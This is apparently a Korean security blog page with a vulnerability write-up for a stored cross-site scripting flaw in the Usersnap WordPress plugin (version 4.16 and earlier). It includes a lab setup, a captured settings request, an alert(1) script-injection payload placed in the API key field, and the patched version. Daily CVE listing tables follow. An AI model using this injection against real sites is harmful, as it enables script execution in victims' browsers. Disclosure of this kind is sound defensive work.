반응형

ref

배경

  • Usersnap wp plugin은 사용자에게 피드백을 받아 관리하는 SaaS형 서비스의 플러그인이다.
  • 워드프레스용 Usersnap 플러그인은 API 키 값에 대한 충분한 입력 값 검사 및 출력 이스케이핑이 없기 때문에 버전 4.16 이하의 모든 버전에서 저장된 apikey 값에 대한 Cross-Site 스크립팅 취약점이 있습니다. 이로 인해 관리자 페이지와 사용자 페이지에서의 xss가 트리거 가능합니다. 관리자에 의해 취약성이 트리거가 가능한것으로 보이기 때문에 영향도는 낮습니다.

분석

409	389	            </p>
410	390	            <script type="text/javascript">
411	 	            jQuery(function() {
412	 	                jQuery('#us-settings-form').submit(function() {
413	 	                    if (jQuery('#us-api-key').val()!=='') {
414	 	                        var s = /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/i
415	 	                        if (!s.test(jQuery('#us-api-key').val())) {
416	 	                            jQuery('#us-api-key').focus();
417	 	                            jQuery('.wrap h2:last').after('<div class="error below-h2" style="margin-top:1em"><p><?php _e('Your API key is not valid, please check again!') ?></p></div>');
 	391	            function domReady(fn) {
 	392	                document.addEventListener("DOMContentLoaded", fn);
 	393	                if (document.readyState === "interactive" || document.readyState === "complete" ) {
 	394	                    fn();
 	395	                }
 	396	            };
 	397	
 	398	            domReady(function() {
 	399	                // validate settings form API key input and handle error display
 	400	                document.querySelector('#us-settings-form').addEventListener('submit', function(evt) {
 	401	                    var apiKeyInputField = document.querySelector('#us-api-key');
 	402	                    if (apiKeyInputField.value !== '') {
 	403	                        var s = /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/i;
 	404	                        if (!s.test(apiKeyInputField.value)) {
 	405	                            apiKeyInputField.focus();
 	406	                            evt.preventDefault();
 	407	                            // create the error message and add it into the DOM
 	408	                            var h2El = document.querySelector('.wrap h2.us-headline');
 	409	                            var divEl = document.createElement('div');
 	410	                            var pEl = document.createElement('p');
 	411	                            var textNode = document.createTextNode('<?php _e('Your API key is not valid, please check again!') ?>');
 	412	                            pEl.appendChild(textNode);
 	413	                            divEl.appendChild(pEl);
 	414	                            divEl.classList.add("error");
 	415	                            divEl.classList.add("below-h2");
 	416	                            divEl.style.marginTop = "1em";
 	417	                            var parentNode = h2El.parentNode;
 	418	                            parentNode.insertBefore(divEl, h2El.nextSibling);

테스트

  • wp docker를 설치하여 테스트 할 수 있다.
//https://github.com/docker/awesome-compose/tree/master/official-documentation-samples/wordpress/

services:
  db:
    # We use a mariadb image which supports both amd64 & arm64 architecture
    image: mariadb:10.6.4-focal
    # If you really want to use MySQL, uncomment the following line
    #image: mysql:8.0.27
    command: '--default-authentication-plugin=mysql_native_password'
    volumes:
      - db_data:/var/lib/mysql
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=somewordpress
      - MYSQL_DATABASE=wordpress
      - MYSQL_USER=wordpress
      - MYSQL_PASSWORD=wordpress
    expose:
      - 3306
      - 33060
  wordpress:
    image: wordpress:latest
    volumes:
      - wp_data:/var/www/html
    ports:
      - 80:80
    restart: always
    environment:
      - WORDPRESS_DB_HOST=db
      - WORDPRESS_DB_USER=wordpress
      - WORDPRESS_DB_PASSWORD=wordpress
      - WORDPRESS_DB_NAME=wordpress
volumes:
  db_data:
  wp_data:
  • 설치 후 기본 설정을 완료 한다.
  • 플러그인 → 플러그인 설치 → 4.16 이하 버젼을 설치→ 플러그인 활성화 한다.

  • 설정→Usersnap→Key를 설정한다. 본 취약점은 여기서 발생한다.

  • 변경 사항을 저장하면 다음과 같은 요청이 발생한다.
POST /wp-admin/options.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <http://localhost:8888/wp-admin/options-general.php?page=usersnap%2Fusersnap.php>
Content-Type: application/x-www-form-urlencoded
Content-Length: 397
Origin: <http://localhost:8888>
Connection: close
Cookie: wordpress_cd9b744c619529c4988e0e94344eaf12=jp27680%7C1680404211%7CVushSRZj3op9Rz4ceEj6sCkGsZvHuRKAr1Jfv1q8WFT%7C1583311e6199cb376b48dd37625eafbd93c292a32829f5847a228693c25f71bd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_cd9b744c619529c4988e0e94344eaf12=test%7C1680404211%7CVushSRZj3op9Rz4ceEj6sCkGsZvHuRKAr1Jfv1q8WFT%7C58f9a23b231a149e43396b44487b5c0064afe2aaf0b68f04b7f4f88f06335295; wp-settings-time-1=1680231562
Upgrade-Insecure-Requests: 1
sec-ch-ua-platform: "macOS"
sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0

option_page=usersnap_options&action=update&_wpnonce=a1d27a2c33&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dusersnap%252Fusersnap.php%26settings-updated%3Dtrue&usersnap_options%5Bapi-key%5D=cbbd390e-7b17-4d35-8107-6a89110a0ada&usersnap_options%5Bvisible-for%5D=all&usersnap_options%5Bvisible-for-backend%5D=backend&us_btn_save=%EB%B3%80%EA%B2%BD%EC%82%AC%ED%95%AD+%EC%A0%80%EC%9E%A5
  • 키값을 스크립트가 실행 가능한 형태로 제작한다. 키값은 위젯 url을 구성하는 파라미터가 된다.
  • 키값으로 완성된 파라미터는 아래의 widget_url로 입력된다.
(function() {
			    var s = document.createElement('script');
			    s.type = 'text/javascript';
			    s.async = true;
			    s.src = "<?php echo $options['widget_url'] ?>";
			    var x = document.getElementsByTagName('head')[0];
			    x.appendChild(s);
			})();
  • 페이로드 예제는 아래와 같이 쓸 수 있다.
option_page=usersnap_options&action=update&_wpnonce=a1d27a2c33&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dusersnap%252Fusersnap.php%26settings-updated%3Dtrue&usersnap_options%5Bapi-key%5D=cbbd390e-7b17-4d35-8107-6a89110a0ada**"</script><script>alert(1)</script>**&usersnap_options%5Bvisible-for%5D=all&usersnap_options%5Bvisible-for-backend%5D=backend&us_btn_save=%EB%B3%80%EA%B2%BD%EC%82%AC%ED%95%AD+%EC%A0%80%EC%9E%A5
  • 이로 인한 프론트의 결과는 아래와 같다.
<meta name="generator" content="WordPress 6.1.1" />
		<script type="text/javascript" data-cfasync="false">
						window['_usersnapconfig'] = {emailBoxValue: 'park.jiho@linecorp.com'};
							(function() {
			    var s = document.createElement('script');
			    s.type = 'text/javascript';
			    s.async = true;
			    s.src = "//api.usersnap.com/load/cbbd390e-7b17-4d35-8107-6a89110a0ada"</script><script>alert(1)</script>.js";
			    var x = document.getElementsByTagName('head')[0];
			    x.appendChild(s);
			})();
		</script>
		<style media="print">#wpadminbar { display:none; }</style>
	<style media="screen">

패치 방법

  • 패치 제공 Usersnap ≥ 4.17
반응형
반응형
datetime subject id link
2023-03-30 00:00:04.855442 (Apache Tomcat) CVE-2023-1663 https://cve.report/CVE-2023-1663
2023-03-30 01:00:01.977769 (GitHub, XSS) CVE-2023-1704 https://cve.report/CVE-2023-1704
2023-03-30 01:00:01.978677 (GitHub, XSS) CVE-2023-1702 https://cve.report/CVE-2023-1702
2023-03-30 01:00:01.979545 (GitHub, XSS) CVE-2023-1701 https://cve.report/CVE-2023-1701
2023-03-30 01:00:01.980573 (XSS) CVE-2023-26982 https://cve.report/CVE-2023-26982
2023-03-30 01:00:01.981656 (WordPress) CVE-2023-1575 https://cve.report/CVE-2023-1575
2023-03-30 02:00:02.259016 (GitHub, XSS) CVE-2023-1703 https://cve.report/CVE-2023-1703
2023-03-30 03:00:02.568748 (SQL injection) CVE-2023-27167 https://cve.report/CVE-2023-27167
2023-03-30 03:00:02.569608 (File Upload) CVE-2023-26968 https://cve.report/CVE-2023-26968
2023-03-30 03:00:02.570518 (XSS) CVE-2023-26292 https://cve.report/CVE-2023-26292
2023-03-30 03:00:02.571414 (XSS) CVE-2023-26291 https://cve.report/CVE-2023-26291
2023-03-30 03:00:02.572371 (XSS) CVE-2023-26290 https://cve.report/CVE-2023-26290
2023-03-30 03:00:02.573285 (nginx) CVE-2023-1550 https://cve.report/CVE-2023-1550
2023-03-30 03:00:02.574148 (XSS) CVE-2022-47596 https://cve.report/CVE-2022-47596
2023-03-30 03:00:02.575035 (Execute Arbitrary code) CVE-2022-48434 https://cve.report/CVE-2022-48434
2023-03-30 04:00:03.061311 (Execute Arbitrary code) CVE-2022-27644 https://cve.report/CVE-2022-27644
2023-03-30 04:00:03.062278 (Execute Arbitrary code) CVE-2022-27643 https://cve.report/CVE-2022-27643
2023-03-30 04:00:03.063357 (Execute Arbitrary code) CVE-2022-27641 https://cve.report/CVE-2022-27641
2023-03-30 04:00:03.064367 (Arbitrary Command) CVE-2022-3210 https://cve.report/CVE-2022-3210
2023-03-30 04:00:03.065302 (Execute Arbitrary code) CVE-2022-3093 https://cve.report/CVE-2022-3093
2023-03-30 04:00:03.066210 (Remote Attack, Execute Arbitrary code) CVE-2022-28644 https://cve.report/CVE-2022-28644
2023-03-30 04:00:03.067133 (Remote Attack, Execute Arbitrary code) CVE-2022-28643 https://cve.report/CVE-2022-28643
2023-03-30 04:00:03.068092 (Remote Attack, Execute Arbitrary code) CVE-2022-28301 https://cve.report/CVE-2022-28301
2023-03-30 05:00:02.460895 (Remote Attack, Execute Arbitrary code) CVE-2022-43650 https://cve.report/CVE-2022-43650
2023-03-30 05:00:02.461866 (Remote Attack, Execute Arbitrary code) CVE-2022-43649 https://cve.report/CVE-2022-43649
2023-03-30 05:00:02.462825 (Execute Arbitrary code) CVE-2022-43648 https://cve.report/CVE-2022-43648
2023-03-30 05:00:02.463791 (Execute Arbitrary code) CVE-2022-43647 https://cve.report/CVE-2022-43647
2023-03-30 05:00:02.464804 (Execute Arbitrary code) CVE-2022-43646 https://cve.report/CVE-2022-43646
2023-03-30 05:00:02.465925 (Execute Arbitrary code) CVE-2022-43645 https://cve.report/CVE-2022-43645
2023-03-30 05:00:02.466852 (Execute Arbitrary code) CVE-2022-43644 https://cve.report/CVE-2022-43644
2023-03-30 05:00:02.467793 (Execute Arbitrary code) CVE-2022-43643 https://cve.report/CVE-2022-43643
2023-03-30 05:00:02.468775 (Execute Arbitrary code) CVE-2022-43642 https://cve.report/CVE-2022-43642
2023-03-30 05:00:02.469730 (Remote Attack, Execute Arbitrary code) CVE-2022-43641 https://cve.report/CVE-2022-43641
2023-03-30 05:00:02.470675 (Remote Attack, Execute Arbitrary code) CVE-2022-43640 https://cve.report/CVE-2022-43640
2023-03-30 05:00:02.471613 (Remote Attack, Execute Arbitrary code) CVE-2022-43639 https://cve.report/CVE-2022-43639
2023-03-30 05:00:02.472752 (Remote Attack, Execute Arbitrary code) CVE-2022-43638 https://cve.report/CVE-2022-43638
2023-03-30 05:00:02.473705 (Remote Attack, Execute Arbitrary code) CVE-2022-43637 https://cve.report/CVE-2022-43637
2023-03-30 05:00:02.474916 (Remote Attack, Execute Arbitrary code) CVE-2022-43634 https://cve.report/CVE-2022-43634
2023-03-30 05:00:02.475911 (Execute Arbitrary code) CVE-2022-43633 https://cve.report/CVE-2022-43633
2023-03-30 05:00:02.476845 (Execute Arbitrary code) CVE-2022-43632 https://cve.report/CVE-2022-43632
2023-03-30 05:00:02.477815 (Execute Arbitrary code) CVE-2022-43631 https://cve.report/CVE-2022-43631
2023-03-30 05:00:02.478760 (Execute Arbitrary code) CVE-2022-43630 https://cve.report/CVE-2022-43630
2023-03-30 05:00:02.479721 (Execute Arbitrary code) CVE-2022-43629 https://cve.report/CVE-2022-43629
2023-03-30 05:00:02.480723 (Execute Arbitrary code) CVE-2022-43628 https://cve.report/CVE-2022-43628
2023-03-30 05:00:02.481667 (Execute Arbitrary code) CVE-2022-43627 https://cve.report/CVE-2022-43627
2023-03-30 05:00:02.482604 (Execute Arbitrary code) CVE-2022-43626 https://cve.report/CVE-2022-43626
2023-03-30 05:00:02.532617 (Execute Arbitrary code) CVE-2022-43625 https://cve.report/CVE-2022-43625
2023-03-30 05:00:02.533673 (Execute Arbitrary code) CVE-2022-43624 https://cve.report/CVE-2022-43624
2023-03-30 05:00:02.534628 (Execute Arbitrary code) CVE-2022-43623 https://cve.report/CVE-2022-43623
2023-03-30 05:00:02.535575 (Execute Arbitrary code) CVE-2022-43622 https://cve.report/CVE-2022-43622
2023-03-30 05:00:02.536770 (Execute Arbitrary code) CVE-2022-43619 https://cve.report/CVE-2022-43619
2023-03-30 05:00:02.537726 (Remote Attack, Execute Arbitrary code) CVE-2022-43618 https://cve.report/CVE-2022-43618
2023-03-30 05:00:02.538671 (Remote Attack, Execute Arbitrary code) CVE-2022-43617 https://cve.report/CVE-2022-43617
2023-03-30 05:00:02.539609 (Remote Attack, Execute Arbitrary code) CVE-2022-43616 https://cve.report/CVE-2022-43616
2023-03-30 05:00:02.540598 (Remote Attack, Execute Arbitrary code) CVE-2022-43615 https://cve.report/CVE-2022-43615
2023-03-30 05:00:02.541538 (Remote Attack, Execute Arbitrary code) CVE-2022-43614 https://cve.report/CVE-2022-43614
2023-03-30 05:00:02.542481 (Remote Attack, Execute Arbitrary code) CVE-2022-43613 https://cve.report/CVE-2022-43613
2023-03-30 05:00:02.543431 (Remote Attack, Execute Arbitrary code) CVE-2022-43612 https://cve.report/CVE-2022-43612
2023-03-30 05:00:02.544423 (Remote Attack, Execute Arbitrary code) CVE-2022-43611 https://cve.report/CVE-2022-43611
2023-03-30 05:00:02.545370 (Remote Attack, Execute Arbitrary code) CVE-2022-43610 https://cve.report/CVE-2022-43610
2023-03-30 05:00:02.546310 (Remote Attack, Execute Arbitrary code) CVE-2022-43609 https://cve.report/CVE-2022-43609
2023-03-30 05:00:02.547250 (Execute Arbitrary code) CVE-2022-43608 https://cve.report/CVE-2022-43608
2023-03-30 05:00:02.548249 (Remote Attack, Execute Arbitrary code) CVE-2022-37389 https://cve.report/CVE-2022-37389
2023-03-30 05:00:02.549187 (Remote Attack, Execute Arbitrary code) CVE-2022-37388 https://cve.report/CVE-2022-37388
2023-03-30 05:00:02.550124 (Remote Attack, Execute Arbitrary code) CVE-2022-37387 https://cve.report/CVE-2022-37387
2023-03-30 05:00:02.551074 (Remote Attack, Execute Arbitrary code) CVE-2022-37386 https://cve.report/CVE-2022-37386
2023-03-30 05:00:02.552050 (Remote Attack, Execute Arbitrary code) CVE-2022-37384 https://cve.report/CVE-2022-37384
2023-03-30 05:00:02.553291 (Remote Attack, Execute Arbitrary code) CVE-2022-37383 https://cve.report/CVE-2022-37383
2023-03-30 05:00:02.554244 (Remote Attack, Execute Arbitrary code) CVE-2022-37375 https://cve.report/CVE-2022-37375
2023-03-30 05:00:02.555183 (Remote Attack, Execute Arbitrary code) CVE-2022-37373 https://cve.report/CVE-2022-37373
2023-03-30 05:00:02.556162 (Remote Attack, Execute Arbitrary code) CVE-2022-37372 https://cve.report/CVE-2022-37372
2023-03-30 05:00:02.557106 (Remote Attack, Execute Arbitrary code) CVE-2022-37370 https://cve.report/CVE-2022-37370
2023-03-30 05:00:02.558045 (Remote Attack, Execute Arbitrary code) CVE-2022-37367 https://cve.report/CVE-2022-37367
2023-03-30 05:00:02.558987 (Remote Attack, Execute Arbitrary code) CVE-2022-37366 https://cve.report/CVE-2022-37366
2023-03-30 05:00:02.559955 (Remote Attack, Execute Arbitrary code) CVE-2022-37365 https://cve.report/CVE-2022-37365
2023-03-30 05:00:02.560887 (Remote Attack, Execute Arbitrary code) CVE-2022-37363 https://cve.report/CVE-2022-37363
2023-03-30 05:00:02.561806 (Remote Attack, Execute Arbitrary code) CVE-2022-37356 https://cve.report/CVE-2022-37356
2023-03-30 05:00:02.562835 (Remote Attack, Execute Arbitrary code) CVE-2022-37355 https://cve.report/CVE-2022-37355
2023-03-30 05:00:02.563896 (Remote Attack, Execute Arbitrary code) CVE-2022-37353 https://cve.report/CVE-2022-37353
2023-03-30 05:00:02.564889 (Remote Attack, Execute Arbitrary code) CVE-2022-37352 https://cve.report/CVE-2022-37352
2023-03-30 05:00:02.565860 (Remote Attack, Execute Arbitrary code) CVE-2022-37351 https://cve.report/CVE-2022-37351
2023-03-30 05:00:02.566848 (Remote Attack, Execute Arbitrary code) CVE-2022-37350 https://cve.report/CVE-2022-37350
2023-03-30 05:00:02.567896 (Remote Attack, Execute Arbitrary code) CVE-2022-37349 https://cve.report/CVE-2022-37349
2023-03-30 05:00:02.568922 (Remote Attack) CVE-2022-37012 https://cve.report/CVE-2022-37012
2023-03-30 05:00:02.569912 (Remote Attack) CVE-2022-36983 https://cve.report/CVE-2022-36983
2023-03-30 05:00:02.570918 (Remote Attack) CVE-2022-36982 https://cve.report/CVE-2022-36982
2023-03-30 05:00:02.571962 (Remote Attack, Execute Arbitrary code) CVE-2022-36981 https://cve.report/CVE-2022-36981
2023-03-30 05:00:02.572960 (Remote Attack) CVE-2022-36980 https://cve.report/CVE-2022-36980
2023-03-30 05:00:02.573955 (Remote Attack) CVE-2022-36979 https://cve.report/CVE-2022-36979
2023-03-30 05:00:02.574950 (Remote Attack, Execute Arbitrary code) CVE-2022-36978 https://cve.report/CVE-2022-36978
2023-03-30 05:00:02.575983 (Remote Attack, Execute Arbitrary code) CVE-2022-36977 https://cve.report/CVE-2022-36977
2023-03-30 05:00:02.576969 (Remote Attack) CVE-2022-36976 https://cve.report/CVE-2022-36976
2023-03-30 05:00:02.577937 (Remote Attack) CVE-2022-36975 https://cve.report/CVE-2022-36975
2023-03-30 05:00:02.579070 (Remote Attack, Execute Arbitrary code) CVE-2022-36974 https://cve.report/CVE-2022-36974
2023-03-30 05:00:02.580272 (Remote Attack) CVE-2022-36973 https://cve.report/CVE-2022-36973
2023-03-30 05:00:02.581259 (Remote Attack) CVE-2022-36972 https://cve.report/CVE-2022-36972
2023-03-30 05:00:02.632265 (Remote Attack, Execute Arbitrary code) CVE-2022-36971 https://cve.report/CVE-2022-36971
2023-03-30 05:00:02.633454 (Remote Attack, Execute Arbitrary code) CVE-2022-36970 https://cve.report/CVE-2022-36970
2023-03-30 05:00:02.634556 (Remote Attack, XXE) CVE-2022-36969 https://cve.report/CVE-2022-36969
2023-03-30 05:00:02.635618 (Remote Attack, Execute Arbitrary code) CVE-2022-28688 https://cve.report/CVE-2022-28688
2023-03-30 05:00:02.636678 (Remote Attack, Execute Arbitrary code) CVE-2022-28687 https://cve.report/CVE-2022-28687
2023-03-30 05:00:02.637665 (Remote Attack, Execute Arbitrary code) CVE-2022-28686 https://cve.report/CVE-2022-28686
2023-03-30 05:00:02.638659 (Remote Attack, Execute Arbitrary code) CVE-2022-28685 https://cve.report/CVE-2022-28685
2023-03-30 05:00:02.639656 (Remote Attack, Execute Arbitrary code) CVE-2022-28647 https://cve.report/CVE-2022-28647
2023-03-30 05:00:02.647136 (Remote Attack, Execute Arbitrary code) CVE-2022-28646 https://cve.report/CVE-2022-28646
2023-03-30 05:00:02.648194 (Remote Attack, Execute Arbitrary code) CVE-2022-28645 https://cve.report/CVE-2022-28645
2023-03-30 05:00:02.658705 (Remote Attack, Execute Arbitrary code) CVE-2022-28642 https://cve.report/CVE-2022-28642
2023-03-30 05:00:02.661060 (Remote Attack, Execute Arbitrary code) CVE-2022-28641 https://cve.report/CVE-2022-28641
2023-03-30 05:00:02.662941 (Remote Attack, Execute Arbitrary code) CVE-2022-28320 https://cve.report/CVE-2022-28320
2023-03-30 05:00:02.665782 (Remote Attack, Execute Arbitrary code) CVE-2022-28319 https://cve.report/CVE-2022-28319
2023-03-30 05:00:02.667960 (Remote Attack, Execute Arbitrary code) CVE-2022-28318 https://cve.report/CVE-2022-28318
2023-03-30 05:00:02.669386 (Remote Attack, Execute Arbitrary code) CVE-2022-28317 https://cve.report/CVE-2022-28317
2023-03-30 05:00:02.670945 (Remote Attack, Execute Arbitrary code) CVE-2022-28316 https://cve.report/CVE-2022-28316
2023-03-30 05:00:02.672532 (Remote Attack, Execute Arbitrary code) CVE-2022-28315 https://cve.report/CVE-2022-28315
2023-03-30 05:00:02.674056 (Remote Attack, Execute Arbitrary code) CVE-2022-28314 https://cve.report/CVE-2022-28314
2023-03-30 05:00:02.675242 (Remote Attack, Execute Arbitrary code) CVE-2022-28313 https://cve.report/CVE-2022-28313
2023-03-30 05:00:02.676439 (Remote Attack, Execute Arbitrary code) CVE-2022-28312 https://cve.report/CVE-2022-28312
2023-03-30 05:00:02.677682 (Remote Attack, Execute Arbitrary code) CVE-2022-28311 https://cve.report/CVE-2022-28311
2023-03-30 05:00:02.679148 (Remote Attack, Execute Arbitrary code) CVE-2022-28310 https://cve.report/CVE-2022-28310
2023-03-30 06:00:02.577885 (Docker) CVE-2023-25809 https://cve.report/CVE-2023-25809
2023-03-30 06:00:02.578915 (XSS) CVE-2022-47613 https://cve.report/CVE-2022-47613
2023-03-30 06:00:02.579974 (XSS) CVE-2022-47610 https://cve.report/CVE-2022-47610
2023-03-30 06:00:02.580975 (XSS) CVE-2022-47607 https://cve.report/CVE-2022-47607
2023-03-30 06:00:02.581984 (XSS) CVE-2022-47603 https://cve.report/CVE-2022-47603
2023-03-30 06:00:02.582985 (SQL injection) CVE-2022-45355 https://cve.report/CVE-2022-45355
2023-03-30 06:00:02.584086 (Execute Arbitrary code) CVE-2022-42433 https://cve.report/CVE-2022-42433
2023-03-30 06:00:02.585149 (Execute Arbitrary code) CVE-2022-42432 https://cve.report/CVE-2022-42432
2023-03-30 06:00:02.586199 (Execute Arbitrary code) CVE-2022-42431 https://cve.report/CVE-2022-42431
2023-03-30 06:00:02.632293 (Execute Arbitrary code) CVE-2022-42430 https://cve.report/CVE-2022-42430
2023-03-30 06:00:02.633412 (Remote Attack) CVE-2022-42429 https://cve.report/CVE-2022-42429
2023-03-30 06:00:02.634461 (Remote Attack) CVE-2022-42428 https://cve.report/CVE-2022-42428
2023-03-30 06:00:02.635508 (Remote Attack) CVE-2022-42427 https://cve.report/CVE-2022-42427
2023-03-30 06:00:02.636639 (Remote Attack) CVE-2022-42426 https://cve.report/CVE-2022-42426
2023-03-30 06:00:02.637688 (Remote Attack) CVE-2022-42425 https://cve.report/CVE-2022-42425
2023-03-30 06:00:02.638736 (Remote Attack) CVE-2022-42424 https://cve.report/CVE-2022-42424
2023-03-30 06:00:02.639798 (Remote Attack, Execute Arbitrary code) CVE-2022-37391 https://cve.report/CVE-2022-37391
2023-03-30 06:00:02.640894 (Remote Attack, Execute Arbitrary code) CVE-2022-37390 https://cve.report/CVE-2022-37390
2023-03-30 06:00:02.641945 (Remote Attack, Execute Arbitrary code) CVE-2022-37385 https://cve.report/CVE-2022-37385
2023-03-30 06:00:02.643136 (Remote Attack, Execute Arbitrary code) CVE-2022-37382 https://cve.report/CVE-2022-37382
2023-03-30 06:00:02.644255 (Remote Attack, Execute Arbitrary code) CVE-2022-37381 https://cve.report/CVE-2022-37381
2023-03-30 06:00:02.645304 (Remote Attack, Execute Arbitrary code) CVE-2022-37380 https://cve.report/CVE-2022-37380
2023-03-30 06:00:02.646356 (Remote Attack, Execute Arbitrary code) CVE-2022-37379 https://cve.report/CVE-2022-37379
2023-03-30 06:00:02.647401 (Remote Attack, Execute Arbitrary code) CVE-2022-37378 https://cve.report/CVE-2022-37378
2023-03-30 06:00:02.648484 (Remote Attack, Execute Arbitrary code) CVE-2022-37377 https://cve.report/CVE-2022-37377
2023-03-30 06:00:02.649545 (Remote Attack, Execute Arbitrary code) CVE-2022-37376 https://cve.report/CVE-2022-37376
2023-03-30 06:00:02.650624 (Remote Attack, Execute Arbitrary code) CVE-2022-37374 https://cve.report/CVE-2022-37374
2023-03-30 06:00:02.651669 (Remote Attack, Execute Arbitrary code) CVE-2022-37371 https://cve.report/CVE-2022-37371
2023-03-30 06:00:02.652753 (Remote Attack, Execute Arbitrary code) CVE-2022-37369 https://cve.report/CVE-2022-37369
2023-03-30 06:00:02.653810 (Remote Attack, Execute Arbitrary code) CVE-2022-37368 https://cve.report/CVE-2022-37368
2023-03-30 06:00:02.654853 (Remote Attack, Execute Arbitrary code) CVE-2022-37364 https://cve.report/CVE-2022-37364
2023-03-30 06:00:02.655938 (Remote Attack, Execute Arbitrary code) CVE-2022-37362 https://cve.report/CVE-2022-37362
2023-03-30 06:00:02.656984 (Remote Attack, Execute Arbitrary code) CVE-2022-37361 https://cve.report/CVE-2022-37361
2023-03-30 06:00:02.658027 (Remote Attack, Execute Arbitrary code) CVE-2022-37360 https://cve.report/CVE-2022-37360
2023-03-30 06:00:02.659063 (Remote Attack, Execute Arbitrary code) CVE-2022-37359 https://cve.report/CVE-2022-37359
2023-03-30 06:00:02.660143 (Remote Attack, Execute Arbitrary code) CVE-2022-37358 https://cve.report/CVE-2022-37358
2023-03-30 06:00:02.661171 (Remote Attack, Execute Arbitrary code) CVE-2022-37357 https://cve.report/CVE-2022-37357
2023-03-30 06:00:02.662206 (Remote Attack, Execute Arbitrary code) CVE-2022-37354 https://cve.report/CVE-2022-37354
2023-03-30 06:00:02.663248 (Remote Attack) CVE-2022-37013 https://cve.report/CVE-2022-37013
2023-03-30 06:00:02.664339 (Remote Attack, Execute Arbitrary code) CVE-2022-2848 https://cve.report/CVE-2022-2848
2023-03-30 06:00:02.665371 (Remote Attack, Execute Arbitrary code) CVE-2022-2825 https://cve.report/CVE-2022-2825
2023-03-30 06:00:02.666415 (Remote Attack, Execute Arbitrary code) CVE-2022-2561 https://cve.report/CVE-2022-2561
2023-03-30 06:00:02.667465 (Remote Attack) CVE-2022-2560 https://cve.report/CVE-2022-2560
2023-03-30 06:00:02.668529 (Remote Code Execution) CVE-2023-28501 https://cve.report/CVE-2023-28501
2023-03-30 06:00:02.669526 (XSS) CVE-2023-22705 https://cve.report/CVE-2023-22705
2023-03-30 06:00:02.670701 (XSS) CVE-2022-47602 https://cve.report/CVE-2022-47602
2023-03-30 07:00:02.760026 (Remote Code Execution) CVE-2023-28504 https://cve.report/CVE-2023-28504
2023-03-30 07:00:02.761176 (Remote Code Execution) CVE-2023-28502 https://cve.report/CVE-2023-28502
2023-03-30 11:00:02.342545 (HashiCorp Vault) CVE-2023-25000 https://cve.report/CVE-2023-25000
2023-03-30 11:00:02.343641 (HashiCorp Vault) CVE-2023-0665 https://cve.report/CVE-2023-0665
2023-03-30 11:00:02.344821 (SQL injection, HashiCorp Vault) CVE-2023-0620 https://cve.report/CVE-2023-0620
2023-03-30 19:00:02.942557 (GitHub) CVE-2023-1712 https://cve.report/CVE-2023-1712
2023-03-30 19:00:02.943745 (XSS) CVE-2023-1013 https://cve.report/CVE-2023-1013
2023-03-30 20:00:02.858824 (Command Injection, Command Execution) CVE-2023-28935 https://cve.report/CVE-2023-28935
2023-03-30 21:00:02.443403 (WordPress, XSS, Wordpress Plugin) CVE-2023-23677 https://cve.report/CVE-2023-23677
2023-03-30 21:00:02.444531 (XSS) CVE-2023-23675 https://cve.report/CVE-2023-23675
2023-03-30 21:00:02.445792 (WordPress, XSS, Wordpress Plugin) CVE-2023-23670 https://cve.report/CVE-2023-23670
2023-03-30 22:00:02.936043 (XSS) CVE-2023-28733 https://cve.report/CVE-2023-28733
2023-03-30 22:00:02.937155 (Path Traversal) CVE-2023-28732 https://cve.report/CVE-2023-28732
2023-03-30 22:00:02.938253 (Remote Code Execution, PHP, File Upload) CVE-2023-28731 https://cve.report/CVE-2023-28731
2023-03-30 22:00:02.939503 (WordPress, XSS) CVE-2023-25040 https://cve.report/CVE-2023-25040
2023-03-30 22:00:02.940708 (XSS) CVE-2023-24399 https://cve.report/CVE-2023-24399
2023-03-30 22:00:02.941787 (XSS) CVE-2023-23681 https://cve.report/CVE-2023-23681

 

반응형
반응형
datetime subject id link
2023-03-29 01:00:02.161910 (Remote Attack, PHP, XSS) CVE-2023-27008 https://cve.report/CVE-2023-27008
2023-03-29 01:00:02.162960 (OpenSSL) CVE-2023-0466 https://cve.report/CVE-2023-0466
2023-03-29 01:00:02.163983 (OpenSSL) CVE-2023-0465 https://cve.report/CVE-2023-0465
2023-03-29 03:00:02.958672 (Remote Code Execution) CVE-2023-27821 https://cve.report/CVE-2023-27821
2023-03-29 04:00:02.364127 (Remote Attack) CVE-2022-24908 https://cve.report/CVE-2022-24908
2023-03-29 04:00:02.365041 (Remote Attack) CVE-2022-24907 https://cve.report/CVE-2022-24907
2023-03-29 04:00:02.366032 (Remote Attack) CVE-2022-24673 https://cve.report/CVE-2022-24673
2023-03-29 04:00:02.367221 (Remote Attack) CVE-2022-23125 https://cve.report/CVE-2022-23125
2023-03-29 04:00:02.368161 (Remote Attack) CVE-2022-23124 https://cve.report/CVE-2022-23124
2023-03-29 04:00:02.369039 (Remote Attack) CVE-2022-23123 https://cve.report/CVE-2022-23123
2023-03-29 04:00:02.369907 (Remote Attack) CVE-2022-23122 https://cve.report/CVE-2022-23122
2023-03-29 04:00:02.370772 (Remote Attack) CVE-2022-23121 https://cve.report/CVE-2022-23121
2023-03-29 04:00:02.371761 (Remote Attack) CVE-2022-1229 https://cve.report/CVE-2022-1229
2023-03-29 04:00:02.372783 (Remote Attack) CVE-2022-0194 https://cve.report/CVE-2022-0194
2023-03-29 04:00:02.373633 (File Upload) CVE-2023-27246 https://cve.report/CVE-2023-27246
2023-03-29 06:00:02.763871 (Jenkins, Azure) CVE-2023-25722 https://cve.report/CVE-2023-25722
2023-03-29 06:00:02.764756 (Jenkins) CVE-2023-25721 https://cve.report/CVE-2023-25721
2023-03-29 07:00:02.232209 (Command Injection) CVE-2023-28712 https://cve.report/CVE-2023-28712
